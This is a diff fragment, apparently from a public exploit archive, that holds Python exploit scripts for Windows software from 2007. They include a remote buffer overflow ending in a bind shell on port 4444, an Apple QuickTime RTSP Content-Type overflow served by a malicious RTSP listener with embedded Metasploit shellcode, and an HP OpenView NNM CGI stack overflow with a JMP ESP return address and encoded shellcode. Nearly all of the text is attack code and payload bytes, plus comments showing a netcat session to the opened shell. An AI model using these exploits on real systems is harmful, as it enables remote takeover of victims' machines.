-"\x41\x39\x4b\x71\x74\x4c\x4b\x50\x43\x76\x50\x4e\x6b\x41\x50\x54"
+"\x41\x39\x4b\x71\x74\x4c\x4b\x50\x43\x76\x50\x4e\x6b\x41\x50\x54"
-"\x4c\x6e\x6b\x32\x50\x45\x4c\x4c\x6d\x6e\x6b\x47\x30\x36\x68\x73"
+"\x4c\x6e\x6b\x32\x50\x45\x4c\x4c\x6d\x6e\x6b\x47\x30\x36\x68\x73"
-"\x6e\x32\x48\x6c\x4e\x30\x4e\x56\x6e\x5a\x4c\x56\x30\x6b\x4f\x4b"
+"\x6e\x32\x48\x6c\x4e\x30\x4e\x56\x6e\x5a\x4c\x56\x30\x6b\x4f\x4b"
-"\x66\x71\x76\x62\x73\x31\x76\x45\x38\x74\x73\x76\x52\x71\x78\x63"
+"\x66\x71\x76\x62\x73\x31\x76\x45\x38\x74\x73\x76\x52\x71\x78\x63"
-"\x47\x63\x43\x76\x52\x31\x4f\x41\x44\x79\x6f\x4e\x30\x65\x38\x58"
+"\x47\x63\x43\x76\x52\x31\x4f\x41\x44\x79\x6f\x4e\x30\x65\x38\x58"
-"\x4b\x48\x6d\x4b\x4c\x75\x6b\x72\x70\x6b\x4f\x7a\x76\x71\x4f\x6f"
+"\x4b\x48\x6d\x4b\x4c\x75\x6b\x72\x70\x6b\x4f\x7a\x76\x71\x4f\x6f"
-"\x79\x6d\x35\x51\x76\x6c\x41\x58\x6d\x65\x58\x57\x72\x73\x65\x73"
+"\x79\x6d\x35\x51\x76\x6c\x41\x58\x6d\x65\x58\x57\x72\x73\x65\x73"
-"\x5a\x44\x42\x49\x6f\x6e\x30\x31\x78\x4e\x39\x64\x49\x6a\x55\x4e"
+"\x5a\x44\x42\x49\x6f\x6e\x30\x31\x78\x4e\x39\x64\x49\x6a\x55\x4e"
-"\x4d\x53\x67\x79\x6f\x6e\x36\x41\x43\x31\x43\x46\x33\x73\x63\x42"
+"\x4d\x53\x67\x79\x6f\x6e\x36\x41\x43\x31\x43\x46\x33\x73\x63\x42"
-"\x73\x30\x43\x41\x43\x32\x63\x70\x53\x4b\x4f\x38\x50\x43\x56\x71"
+"\x73\x30\x43\x41\x43\x32\x63\x70\x53\x4b\x4f\x38\x50\x43\x56\x71"
-"\x78\x74\x51\x33\x6c\x31\x76\x70\x53\x4e\x69\x5a\x41\x4d\x45\x41"
+"\x78\x74\x51\x33\x6c\x31\x76\x70\x53\x4e\x69\x5a\x41\x4d\x45\x41"
-"\x78\x4c\x64\x35\x4a\x30\x70\x6b\x77\x52\x77\x6b\x4f\x6e\x36\x62"
+"\x78\x4c\x64\x35\x4a\x30\x70\x6b\x77\x52\x77\x6b\x4f\x6e\x36\x62"
-"\x4a\x34\x50\x72\x71\x76\x35\x69\x6f\x4e\x30\x45\x38\x6e\x44\x4c"
+"\x4a\x34\x50\x72\x71\x76\x35\x69\x6f\x4e\x30\x45\x38\x6e\x44\x4c"
-"\x6d\x46\x4e\x4d\x39\x46\x37\x59\x6f\x4b\x66\x30\x53\x62\x75\x49"
+"\x6d\x46\x4e\x4d\x39\x46\x37\x59\x6f\x4b\x66\x30\x53\x62\x75\x49"
-"\x6f\x38\x50\x63\x58\x6b\x55\x37\x39\x4e\x66\x71\x59\x41\x47\x6b"
+"\x6f\x38\x50\x63\x58\x6b\x55\x37\x39\x4e\x66\x71\x59\x41\x47\x6b"
-"\x4f\x5a\x76\x70\x50\x51\x44\x31\x44\x70\x55\x6b\x4f\x68\x50\x6e"
+"\x4f\x5a\x76\x70\x50\x51\x44\x31\x44\x70\x55\x6b\x4f\x68\x50\x6e"
-"\x73\x71\x78\x59\x77\x70\x79\x5a\x66\x71\x69\x66\x37\x6b\x4f\x6a"
+"\x73\x71\x78\x59\x77\x70\x79\x5a\x66\x71\x69\x66\x37\x6b\x4f\x6a"
-"\x76\x52\x75\x4b\x4f\x5a\x70\x71\x76\x31\x7a\x55\x34\x31\x76\x72"
+"\x76\x52\x75\x4b\x4f\x5a\x70\x71\x76\x31\x7a\x55\x34\x31\x76\x72"
-"\x48\x50\x63\x72\x4d\x6f\x79\x78\x65\x53\x5a\x72\x70\x72\x79\x76"
+"\x48\x50\x63\x72\x4d\x6f\x79\x78\x65\x53\x5a\x72\x70\x72\x79\x76"
-"\x49\x78\x4c\x4b\x39\x4d\x37\x53\x5a\x32\x64\x6d\x59\x6a\x42\x37"
+"\x49\x78\x4c\x4b\x39\x4d\x37\x53\x5a\x32\x64\x6d\x59\x6a\x42\x37"
-"\x41\x6b\x70\x4b\x43\x4f\x5a\x49\x6e\x63\x72\x56\x4d\x49\x6e\x30"
+"\x41\x6b\x70\x4b\x43\x4f\x5a\x49\x6e\x63\x72\x56\x4d\x49\x6e\x30"
-"\x42\x64\x6c\x6d\x43\x6c\x4d\x62\x5a\x75\x68\x6c\x6b\x6e\x4b\x6e"
+"\x42\x64\x6c\x6d\x43\x6c\x4d\x62\x5a\x75\x68\x6c\x6b\x6e\x4b\x6e"
-"\x4b\x50\x68\x43\x42\x49\x6e\x6c\x73\x62\x36\x69\x6f\x74\x35\x30"
+"\x4b\x50\x68\x43\x42\x49\x6e\x6c\x73\x62\x36\x69\x6f\x74\x35\x30"
-"\x44\x6b\x4f\x48\x56\x53\x6b\x70\x57\x73\x62\x71\x41\x70\x51\x76"
+"\x44\x6b\x4f\x48\x56\x53\x6b\x70\x57\x73\x62\x71\x41\x70\x51\x76"
-"\x31\x63\x5a\x57\x71\x42\x71\x66\x31\x72\x75\x71\x41\x49\x6f\x68"
+"\x31\x63\x5a\x57\x71\x42\x71\x66\x31\x72\x75\x71\x41\x49\x6f\x68"
-"\x50\x75\x38\x4c\x6d\x79\x49\x74\x45\x5a\x6e\x32\x73\x4b\x4f\x6e"
+"\x50\x75\x38\x4c\x6d\x79\x49\x74\x45\x5a\x6e\x32\x73\x4b\x4f\x6e"
-"\x36\x72\x4a\x6b\x4f\x6b\x4f\x50\x37\x79\x6f\x4e\x30\x6e\x6b\x46"
+"\x36\x72\x4a\x6b\x4f\x6b\x4f\x50\x37\x79\x6f\x4e\x30\x6e\x6b\x46"
-"\x37\x69\x6c\x4f\x73\x69\x54\x52\x44\x49\x6f\x4b\x66\x43\x62\x6b"
+"\x37\x69\x6c\x4f\x73\x69\x54\x52\x44\x49\x6f\x4b\x66\x43\x62\x6b"
-"\x4f\x5a\x70\x51\x78\x7a\x50\x4f\x7a\x76\x64\x31\x4f\x33\x63\x4b"
+"\x4f\x5a\x70\x51\x78\x7a\x50\x4f\x7a\x76\x64\x31\x4f\x33\x63\x4b"
-"\x4f\x48\x56\x49\x6f\x48\x50\x61")
+"\x4f\x48\x56\x49\x6f\x48\x50\x61")
-expl = socket.socket ( socket.AF_INET, socket.SOCK_STREAM )
+expl = socket.socket ( socket.AF_INET, socket.SOCK_STREAM )
-print "[*] Connecting to "+sys.argv[1]
+print "[*] Connecting to "+sys.argv[1]
-expl.connect ( ( sys.argv[1], 1581 ) )
+expl.connect ( ( sys.argv[1], 1581 ) )
-print "[*] Sending evil buffer, ph33r"
+print "[*] Sending evil buffer, ph33r"
-expl.send ( 'GET /BACLIENT HTTP/1.0\r\nHost: 192.168.1.1 '+ buffer+'\r\n\r\n')
+expl.send ( 'GET /BACLIENT HTTP/1.0\r\nHost: 192.168.1.1 '+ buffer+'\r\n\r\n')
-expl.close()
+expl.close()
-print "[*] Check port 4444 for bindshell"
+print "[*] Check port 4444 for bindshell"
-
+
-# milw0rm.com [2007-10-27]
+# milw0rm.com [2007-10-27]
--- a/platforms/windows/remote/4657.py
+++ b/platforms/windows/remote/4657.py
@ -1,125 +1,125 @@
-#!/usr/bin/python
+#!/usr/bin/python
-##########################################################################
+##########################################################################
-# http://www.offensive-security.com
+# http://www.offensive-security.com
-# Bug discovered by Krystian Kloskowski (h07) <h07@interia.pl>
+# Bug discovered by Krystian Kloskowski (h07) <h07@interia.pl>
-# Tested on: Apple QuickTime Player 7.3 / 7.2 IE7,FF /Opera, XP SP2, Vista
+# Tested on: Apple QuickTime Player 7.3 / 7.2 IE7,FF /Opera, XP SP2, Vista
-# This exploit is completely "Universal" .... It has also been modded to work via url redirection ...  
+# This exploit is completely "Universal" .... It has also been modded to work via url redirection ...  
-# Magic RETs work on 7.3,7.2,XPSP2,Vista,IE7,Firefox,Opera....
+# Magic RETs work on 7.3,7.2,XPSP2,Vista,IE7,Firefox,Opera....
-# re-edited by muts and javaguru1999 to annoy Symantec
+# re-edited by muts and javaguru1999 to annoy Symantec
-# http://www.symantec.com/enterprise/security_response/weblog/2007/11/0day_exploit_for_apple_quickti.html
+# http://www.symantec.com/enterprise/security_response/weblog/2007/11/0day_exploit_for_apple_quickti.html
-# there IS NO SPOON!
+# there IS NO SPOON!
-##########################################################################  
+##########################################################################  
-# "With Internet Explorer versions 6 and 7, and the Safari 3 beta,  
+# "With Internet Explorer versions 6 and 7, and the Safari 3 beta,  
-# the attack appears to be prevented because standard buffer overflow  
+# the attack appears to be prevented because standard buffer overflow  
-# prevention processes act before any damage can be done, Florio wrote.  
+# prevention processes act before any damage can be done, Florio wrote.  
-# With Firefox, the QuickTime RTSP response is unmoderated. As a result,  
+# With Firefox, the QuickTime RTSP response is unmoderated. As a result,  
-# the exploit works against Firefox if QuickTime is the default multimedia player,  
+# the exploit works against Firefox if QuickTime is the default multimedia player,  
-# according to Florio."
+# according to Florio."
-##########################################################################
+##########################################################################
-# Calling Quicktime via URL kicks in an Extra Exception Handler,  
+# Calling Quicktime via URL kicks in an Extra Exception Handler,  
-# of which we have no control over.
+# of which we have no control over.
-# By making the buffer larger than the original exploit, we can overwrite  
+# By making the buffer larger than the original exploit, we can overwrite  
-# the last exception handler, and regain control over execution.
+# the last exception handler, and regain control over execution.
-# This is indeed an evil exploit - muhaha.
+# This is indeed an evil exploit - muhaha.
-##########################################################################
+##########################################################################
- 
+ 
-from socket import *
+from socket import *
- 
+ 
-header = (
+header = (
-'RTSP/1.0 200 OK\r\n'
+'RTSP/1.0 200 OK\r\n'
-'CSeq: 1\r\n'
+'CSeq: 1\r\n'
-'Date: 0x00 :P\r\n'
+'Date: 0x00 :P\r\n'
-'Content-Base: rtsp://0.0.0.0/1.mp3/\r\n'
+'Content-Base: rtsp://0.0.0.0/1.mp3/\r\n'
-'Content-Type: %s\r\n' # <-- overflow
+'Content-Type: %s\r\n' # <-- overflow
-'Content-Length: %d\r\n'
+'Content-Length: %d\r\n'
-'\r\n')
+'\r\n')
- 
+ 
-body = (
+body = (
-'v=0\r\n'
+'v=0\r\n'
-'o=- 16689332712 1 IN IP4 0.0.0.0\r\n'
+'o=- 16689332712 1 IN IP4 0.0.0.0\r\n'
-'s=MPEG-1 or 2 Audio, streamed by the PoC Exploit o.O\r\n'
+'s=MPEG-1 or 2 Audio, streamed by the PoC Exploit o.O\r\n'
-'i=1.mp3\r\n'
+'i=1.mp3\r\n'
-'t=0 0\r\n'
+'t=0 0\r\n'
-'a=tool:ciamciaramcia\r\n'
+'a=tool:ciamciaramcia\r\n'
-'a=type:broadcast\r\n'
+'a=type:broadcast\r\n'
-'a=control:*\r\n'
+'a=control:*\r\n'
-'a=range:npt=0-213.077\r\n'
+'a=range:npt=0-213.077\r\n'
-'a=x-qt-text-nam:MPEG-1 or 2 Audio, streamed by the PoC Exploit o.O\r\n'
+'a=x-qt-text-nam:MPEG-1 or 2 Audio, streamed by the PoC Exploit o.O\r\n'
-'a=x-qt-text-inf:1.mp3\r\n'
+'a=x-qt-text-inf:1.mp3\r\n'
-'m=audio 0 RTP/AVP 14\r\n'
+'m=audio 0 RTP/AVP 14\r\n'
-'c=IN IP4 0.0.0.0\r\n'
+'c=IN IP4 0.0.0.0\r\n'
-'a=control:track1\r\n'
+'a=control:track1\r\n'
-)
+)
- 
+ 
-# ExitProcess shellcode will kill browser, but keep the shell open
+# ExitProcess shellcode will kill browser, but keep the shell open
- 
+ 
-shellcode =(# win32_bind -  EXITFUNC=process LPORT=4444 Size=696 Encoder=Alpha2 http://metasploit.com */
+shellcode =(# win32_bind -  EXITFUNC=process LPORT=4444 Size=696 Encoder=Alpha2 http://metasploit.com */
-"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x37\x49\x49\x49\x49"
+"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x37\x49\x49\x49\x49"
-"\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x6a\x42"
+"\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x6a\x42"
-"\x58\x50\x30\x42\x31\x41\x42\x6b\x42\x41\x52\x32\x42\x42\x32\x41"
+"\x58\x50\x30\x42\x31\x41\x42\x6b\x42\x41\x52\x32\x42\x42\x32\x41"
-"\x41\x30\x41\x41\x58\x42\x50\x38\x42\x42\x75\x39\x79\x4b\x4c\x61"
+"\x41\x30\x41\x41\x58\x42\x50\x38\x42\x42\x75\x39\x79\x4b\x4c\x61"
-"\x7a\x38\x6b\x50\x4d\x68\x68\x69\x69\x4b\x4f\x4b\x4f\x59\x6f\x53"
+"\x7a\x38\x6b\x50\x4d\x68\x68\x69\x69\x4b\x4f\x4b\x4f\x59\x6f\x53"
-"\x50\x4e\x6b\x32\x4c\x44\x64\x35\x74\x6e\x6b\x30\x45\x57\x4c\x4e"
+"\x50\x4e\x6b\x32\x4c\x44\x64\x35\x74\x6e\x6b\x30\x45\x57\x4c\x4e"
-"\x6b\x41\x6c\x64\x45\x51\x68\x46\x61\x4a\x4f\x6c\x4b\x30\x4f\x46"
+"\x6b\x41\x6c\x64\x45\x51\x68\x46\x61\x4a\x4f\x6c\x4b\x30\x4f\x46"
-"\x78\x6c\x4b\x71\x4f\x47\x50\x33\x31\x5a\x4b\x61\x59\x6e\x6b\x50"
+"\x78\x6c\x4b\x71\x4f\x47\x50\x33\x31\x5a\x4b\x61\x59\x6e\x6b\x50"
-"\x34\x4e\x6b\x46\x61\x78\x6e\x50\x31\x69\x50\x4e\x79\x4e\x4c\x4b"
+"\x34\x4e\x6b\x46\x61\x78\x6e\x50\x31\x69\x50\x4e\x79\x4e\x4c\x4b"
-"\x34\x6b\x70\x52\x54\x63\x37\x38\x41\x6a\x6a\x44\x4d\x63\x31\x6b"
+"\x34\x6b\x70\x52\x54\x63\x37\x38\x41\x6a\x6a\x44\x4d\x63\x31\x6b"
-"\x72\x68\x6b\x49\x64\x77\x4b\x30\x54\x41\x34\x45\x78\x52\x55\x69"
+"\x72\x68\x6b\x49\x64\x77\x4b\x30\x54\x41\x34\x45\x78\x52\x55\x69"
-"\x75\x6e\x6b\x73\x6f\x75\x74\x56\x61\x7a\x4b\x33\x56\x4e\x6b\x36"
+"\x75\x6e\x6b\x73\x6f\x75\x74\x56\x61\x7a\x4b\x33\x56\x4e\x6b\x36"
-"\x6c\x72\x6b\x4c\x4b\x53\x6f\x35\x4c\x77\x71\x38\x6b\x47\x73\x44"
+"\x6c\x72\x6b\x4c\x4b\x53\x6f\x35\x4c\x77\x71\x38\x6b\x47\x73\x44"
-"\x6c\x6e\x6b\x4b\x39\x32\x4c\x35\x74\x77\x6c\x65\x31\x69\x53\x56"
+"\x6c\x6e\x6b\x4b\x39\x32\x4c\x35\x74\x77\x6c\x65\x31\x69\x53\x56"
-"\x51\x49\x4b\x65\x34\x4e\x6b\x67\x33\x34\x70\x4c\x4b\x77\x30\x74"
+"\x51\x49\x4b\x65\x34\x4e\x6b\x67\x33\x34\x70\x4c\x4b\x77\x30\x74"
-"\x4c\x6e\x6b\x64\x30\x47\x6c\x4c\x6d\x6e\x6b\x41\x50\x63\x38\x53"
+"\x4c\x6e\x6b\x64\x30\x47\x6c\x4c\x6d\x6e\x6b\x41\x50\x63\x38\x53"
-"\x6e\x70\x68\x4e\x6e\x62\x6e\x56\x6e\x38\x6c\x52\x70\x6b\x4f\x7a"
+"\x6e\x70\x68\x4e\x6e\x62\x6e\x56\x6e\x38\x6c\x52\x70\x6b\x4f\x7a"
-"\x76\x72\x46\x61\x43\x43\x56\x52\x48\x77\x43\x64\x72\x51\x78\x71"
+"\x76\x72\x46\x61\x43\x43\x56\x52\x48\x77\x43\x64\x72\x51\x78\x71"
-"\x67\x50\x73\x70\x32\x71\x4f\x31\x44\x4b\x4f\x4a\x70\x75\x38\x78"
+"\x67\x50\x73\x70\x32\x71\x4f\x31\x44\x4b\x4f\x4a\x70\x75\x38\x78"
-"\x4b\x68\x6d\x49\x6c\x75\x6b\x46\x30\x4b\x4f\x79\x46\x53\x6f\x6f"
+"\x4b\x68\x6d\x49\x6c\x75\x6b\x46\x30\x4b\x4f\x79\x46\x53\x6f\x6f"
-"\x79\x38\x65\x73\x56\x4c\x41\x58\x6d\x64\x48\x65\x52\x72\x75\x32"
+"\x79\x38\x65\x73\x56\x4c\x41\x58\x6d\x64\x48\x65\x52\x72\x75\x32"
-"\x4a\x73\x32\x49\x6f\x4a\x70\x33\x58\x78\x59\x63\x39\x39\x65\x4c"
+"\x4a\x73\x32\x49\x6f\x4a\x70\x33\x58\x78\x59\x63\x39\x39\x65\x4c"
-"\x6d\x72\x77\x6b\x4f\x6e\x36\x50\x53\x52\x73\x51\x43\x70\x53\x33"
+"\x6d\x72\x77\x6b\x4f\x6e\x36\x50\x53\x52\x73\x51\x43\x70\x53\x33"
-"\x63\x71\x53\x63\x63\x61\x53\x33\x63\x4b\x4f\x5a\x70\x73\x56\x51"
+"\x63\x71\x53\x63\x63\x61\x53\x33\x63\x4b\x4f\x5a\x70\x73\x56\x51"
-"\x78\x37\x61\x41\x4c\x50\x66\x53\x63\x6c\x49\x5a\x41\x5a\x35\x51"
+"\x78\x37\x61\x41\x4c\x50\x66\x53\x63\x6c\x49\x5a\x41\x5a\x35\x51"
-"\x78\x4d\x74\x67\x6a\x30\x70\x4b\x77\x66\x37\x79\x6f\x4b\x66\x41"
+"\x78\x4d\x74\x67\x6a\x30\x70\x4b\x77\x66\x37\x79\x6f\x4b\x66\x41"
-"\x7a\x32\x30\x72\x71\x33\x65\x59\x6f\x38\x50\x70\x68\x6f\x54\x6e"
+"\x7a\x32\x30\x72\x71\x33\x65\x59\x6f\x38\x50\x70\x68\x6f\x54\x6e"
-"\x4d\x64\x6e\x38\x69\x32\x77\x4b\x4f\x4e\x36\x51\x43\x41\x45\x39"
+"\x4d\x64\x6e\x38\x69\x32\x77\x4b\x4f\x4e\x36\x51\x43\x41\x45\x39"
-"\x6f\x4a\x70\x71\x78\x4a\x45\x71\x59\x6d\x56\x43\x79\x76\x37\x4b"
+"\x6f\x4a\x70\x71\x78\x4a\x45\x71\x59\x6d\x56\x43\x79\x76\x37\x4b"
-"\x4f\x39\x46\x52\x70\x72\x74\x46\x34\x31\x45\x4b\x4f\x68\x50\x4e"
+"\x4f\x39\x46\x52\x70\x72\x74\x46\x34\x31\x45\x4b\x4f\x68\x50\x4e"
-"\x73\x43\x58\x6b\x57\x71\x69\x6f\x36\x53\x49\x76\x37\x6b\x4f\x38"
+"\x73\x43\x58\x6b\x57\x71\x69\x6f\x36\x53\x49\x76\x37\x6b\x4f\x38"
-"\x56\x71\x45\x6b\x4f\x48\x50\x35\x36\x70\x6a\x31\x74\x45\x36\x31"
+"\x56\x71\x45\x6b\x4f\x48\x50\x35\x36\x70\x6a\x31\x74\x45\x36\x31"
-"\x78\x62\x43\x32\x4d\x6f\x79\x7a\x45\x71\x7a\x30\x50\x33\x69\x46"
+"\x78\x62\x43\x32\x4d\x6f\x79\x7a\x45\x71\x7a\x30\x50\x33\x69\x46"
-"\x49\x6a\x6c\x6b\x39\x6a\x47\x73\x5a\x51\x54\x6f\x79\x6d\x32\x30"
+"\x49\x6a\x6c\x6b\x39\x6a\x47\x73\x5a\x51\x54\x6f\x79\x6d\x32\x30"
-"\x31\x59\x50\x38\x73\x4d\x7a\x59\x6e\x43\x72\x36\x4d\x69\x6e\x73"
+"\x31\x59\x50\x38\x73\x4d\x7a\x59\x6e\x43\x72\x36\x4d\x69\x6e\x73"
-"\x72\x54\x6c\x6f\x63\x4c\x4d\x72\x5a\x74\x78\x4c\x6b\x6c\x6b\x6e"
+"\x72\x54\x6c\x6f\x63\x4c\x4d\x72\x5a\x74\x78\x4c\x6b\x6c\x6b\x6e"
-"\x4b\x35\x38\x50\x72\x6b\x4e\x4c\x73\x64\x56\x4b\x4f\x43\x45\x32"
+"\x4b\x35\x38\x50\x72\x6b\x4e\x4c\x73\x64\x56\x4b\x4f\x43\x45\x32"
-"\x64\x79\x6f\x7a\x76\x33\x6b\x32\x77\x62\x72\x63\x61\x33\x61\x30"
+"\x64\x79\x6f\x7a\x76\x33\x6b\x32\x77\x62\x72\x63\x61\x33\x61\x30"
-"\x51\x30\x6a\x53\x31\x71\x41\x46\x31\x52\x75\x32\x71\x6b\x4f\x4e"
+"\x51\x30\x6a\x53\x31\x71\x41\x46\x31\x52\x75\x32\x71\x6b\x4f\x4e"
-"\x30\x70\x68\x4e\x4d\x7a\x79\x46\x65\x4a\x6e\x72\x73\x69\x6f\x58"
+"\x30\x70\x68\x4e\x4d\x7a\x79\x46\x65\x4a\x6e\x72\x73\x69\x6f\x58"
-"\x56\x72\x4a\x69\x6f\x69\x6f\x66\x57\x39\x6f\x58\x50\x4c\x4b\x41"
+"\x56\x72\x4a\x69\x6f\x69\x6f\x66\x57\x39\x6f\x58\x50\x4c\x4b\x41"
-"\x47\x6b\x4c\x6c\x43\x4f\x34\x32\x44\x4b\x4f\x68\x56\x76\x32\x4b"
+"\x47\x6b\x4c\x6c\x43\x4f\x34\x32\x44\x4b\x4f\x68\x56\x76\x32\x4b"
-"\x4f\x4e\x30\x71\x78\x33\x4e\x6a\x78\x49\x72\x43\x43\x61\x43\x4b"
+"\x4f\x4e\x30\x71\x78\x33\x4e\x6a\x78\x49\x72\x43\x43\x61\x43\x4b"
-"\x4f\x48\x56\x69\x6f\x6a\x70\x42")
+"\x4f\x48\x56\x69\x6f\x6a\x70\x42")
- 
+ 
-tmp = "A" * 987
+tmp = "A" * 987
-tmp +="\xeb\x20\x90\x90"  # short jump for 7.2
+tmp +="\xeb\x20\x90\x90"  # short jump for 7.2
-tmp +="\xeb\x20\x9c\x66"  # 669c20eb | funky magic - pop pop ret for 7.2 / short jump for 7.3
+tmp +="\xeb\x20\x9c\x66"  # 669c20eb | funky magic - pop pop ret for 7.2 / short jump for 7.3
-tmp +="\x4e\x28\x86\x66"  # 6686284e | pop pop ret for 7.3
+tmp +="\x4e\x28\x86\x66"  # 6686284e | pop pop ret for 7.3
-tmp += "\x90" * 92
+tmp += "\x90" * 92
-tmp += shellcode
+tmp += shellcode
-tmp += "\x41" * int(30000-len(shellcode))    # play with this buffer if you still get exceptions.  
+tmp += "\x41" * int(30000-len(shellcode))    # play with this buffer if you still get exceptions.  
- 
+ 
-header %= (tmp, len(body))
+header %= (tmp, len(body))
-evil = header + body
+evil = header + body
- 
+ 
-s = socket(AF_INET, SOCK_STREAM)
+s = socket(AF_INET, SOCK_STREAM)
-s.bind(("0.0.0.0", 554))
+s.bind(("0.0.0.0", 554))
-s.listen(1)
+s.listen(1)
-print "[+] Listening on [RTSP] 554"
+print "[+] Listening on [RTSP] 554"
-c, addr = s.accept()
+c, addr = s.accept()
-print "[+] Connection accepted from: %s" % (addr[0])
+print "[+] Connection accepted from: %s" % (addr[0])
-c.recv(1024)
+c.recv(1024)
-c.send(evil)
+c.send(evil)
-raw_input("[+] Done, press enter to quit")
+raw_input("[+] Done, press enter to quit")
-c.close()
+c.close()
-s.close()
+s.close()
-
+
-# milw0rm.com [2007-11-26]
+# milw0rm.com [2007-11-26]
--- a/platforms/windows/remote/4724.py
+++ b/platforms/windows/remote/4724.py
@ -1,89 +1,89 @@
-#!/usr/bin/python
+#!/usr/bin/python
-# HP OpenView Network Node Manager CGI Buffer Overflow
+# HP OpenView Network Node Manager CGI Buffer Overflow
-# Tested on NNM Release B.07.50 / Windows 2000 server SP4
+# Tested on NNM Release B.07.50 / Windows 2000 server SP4
-# http://www.zerodayinitiative.com/advisories/ZDI-07-071.html
+# http://www.zerodayinitiative.com/advisories/ZDI-07-071.html
-# Coded by Mati Aharoni
+# Coded by Mati Aharoni
-# muts|offensive-security|com
+# muts|offensive-security|com
-# http://www.offensive-security.com/0day/hpnnm.txt
+# http://www.offensive-security.com/0day/hpnnm.txt
-# Notes:
+# Notes:
-# Vanilla stack based overflow 
+# Vanilla stack based overflow 
-# I had no idea how to debug this...I ended up modifying the Openview5.exe binary by hijacking 
+# I had no idea how to debug this...I ended up modifying the Openview5.exe binary by hijacking 
-# the entry point and injecting Sleep just before exe execution. This gave me enough 
+# the entry point and injecting Sleep just before exe execution. This gave me enough 
-# time to attach a debugger before program termination. If anyone knows how to properly 
+# time to attach a debugger before program termination. If anyone knows how to properly 
-# debug this, please tell me about it - there *must* be a better way...
+# debug this, please tell me about it - there *must* be a better way...
-#
+#
-# bt tools # ./sploit 192.168.1.105
+# bt tools # ./sploit 192.168.1.105
-# [+] Connecting to 192.168.1.105
+# [+] Connecting to 192.168.1.105
-# [+] Sending Evil Buffer to NNM CGI
+# [+] Sending Evil Buffer to NNM CGI
-# [+] Payload Sent, ph33r.
+# [+] Payload Sent, ph33r.
-#
+#
-# bt tools # nc -nv 192.168.1.105 4444
+# bt tools # nc -nv 192.168.1.105 4444
-# (UNKNOWN) [192.168.1.105] 4444 (krb524) open
+# (UNKNOWN) [192.168.1.105] 4444 (krb524) open
-# Microsoft Windows 2000 [Version 5.00.2195]
+# Microsoft Windows 2000 [Version 5.00.2195]
-# (C) Copyright 1985-2000 Microsoft Corp.
+# (C) Copyright 1985-2000 Microsoft Corp.
-#
+#
-# C:\Program Files\HP OpenView\www\cgi-bin>
+# C:\Program Files\HP OpenView\www\cgi-bin>
-
+
-import socket
+import socket
-import os
+import os
-import sys
+import sys
-expl = socket.socket ( socket.AF_INET, socket.SOCK_STREAM )
+expl = socket.socket ( socket.AF_INET, socket.SOCK_STREAM )
-print "[+] Connecting to "+sys.argv[1]
+print "[+] Connecting to "+sys.argv[1]
-expl.connect ( ( sys.argv[1], 80 ) )
+expl.connect ( ( sys.argv[1], 80 ) )
-print "[+] Sending Evil Buffer to NNM CGI\n"
+print "[+] Sending Evil Buffer to NNM CGI\n"
-buffer="GET /OvCgi/OpenView5.exe?Context=Snmp&Action="
+buffer="GET /OvCgi/OpenView5.exe?Context=Snmp&Action="
-buffer+="A"*5123
+buffer+="A"*5123
-buffer+="\x29\x4c\xe1\x77" # JMP ESP user32.dll Win2kSP4
+buffer+="\x29\x4c\xe1\x77" # JMP ESP user32.dll Win2kSP4
-buffer+="\x90"*32
+buffer+="\x90"*32
-# EXITFUNC=thread LPORT=4444 Size=696 Encoder=Alpha2 http://metasploit.com */
+# EXITFUNC=thread LPORT=4444 Size=696 Encoder=Alpha2 http://metasploit.com */
-buffer+=("\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49"
+buffer+=("\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49"
-"\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x51\x48\x5a\x6a\x68"
+"\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x51\x48\x5a\x6a\x68"
-"\x58\x30\x41\x31\x50\x41\x42\x6b\x41\x41\x78\x32\x41\x42\x32\x42"
+"\x58\x30\x41\x31\x50\x41\x42\x6b\x41\x41\x78\x32\x41\x42\x32\x42"
-"\x41\x30\x42\x41\x41\x58\x38\x41\x42\x50\x75\x6b\x59\x39\x6c\x50"
+"\x41\x30\x42\x41\x41\x58\x38\x41\x42\x50\x75\x6b\x59\x39\x6c\x50"
-"\x6a\x78\x6b\x30\x4d\x49\x78\x38\x79\x59\x6f\x4b\x4f\x39\x6f\x71"
+"\x6a\x78\x6b\x30\x4d\x49\x78\x38\x79\x59\x6f\x4b\x4f\x39\x6f\x71"
-"\x70\x6e\x6b\x50\x6c\x67\x54\x67\x54\x4c\x4b\x72\x65\x65\x6c\x4c"
+"\x70\x6e\x6b\x50\x6c\x67\x54\x67\x54\x4c\x4b\x72\x65\x65\x6c\x4c"
-"\x4b\x41\x6c\x36\x65\x42\x58\x46\x61\x4a\x4f\x6c\x4b\x70\x4f\x64"
+"\x4b\x41\x6c\x36\x65\x42\x58\x46\x61\x4a\x4f\x6c\x4b\x70\x4f\x64"
-"\x58\x4c\x4b\x73\x6f\x47\x50\x76\x61\x7a\x4b\x50\x49\x6c\x4b\x55"
+"\x58\x4c\x4b\x73\x6f\x47\x50\x76\x61\x7a\x4b\x50\x49\x6c\x4b\x55"
-"\x64\x4e\x6b\x54\x41\x7a\x4e\x65\x61\x6f\x30\x6d\x49\x6c\x6c\x4e"
+"\x64\x4e\x6b\x54\x41\x7a\x4e\x65\x61\x6f\x30\x6d\x49\x6c\x6c\x4e"
-"\x64\x4f\x30\x71\x64\x35\x57\x49\x51\x4a\x6a\x56\x6d\x63\x31\x5a"
+"\x64\x4f\x30\x71\x64\x35\x57\x49\x51\x4a\x6a\x56\x6d\x63\x31\x5a"
-"\x62\x5a\x4b\x79\x64\x77\x4b\x61\x44\x57\x54\x45\x78\x63\x45\x78"
+"\x62\x5a\x4b\x79\x64\x77\x4b\x61\x44\x57\x54\x45\x78\x63\x45\x78"
-"\x65\x6c\x4b\x33\x6f\x44\x64\x53\x31\x48\x6b\x41\x76\x4c\x4b\x54"
+"\x65\x6c\x4b\x33\x6f\x44\x64\x53\x31\x48\x6b\x41\x76\x4c\x4b\x54"
-"\x4c\x30\x4b\x6e\x6b\x43\x6f\x45\x4c\x66\x61\x78\x6b\x66\x63\x76"
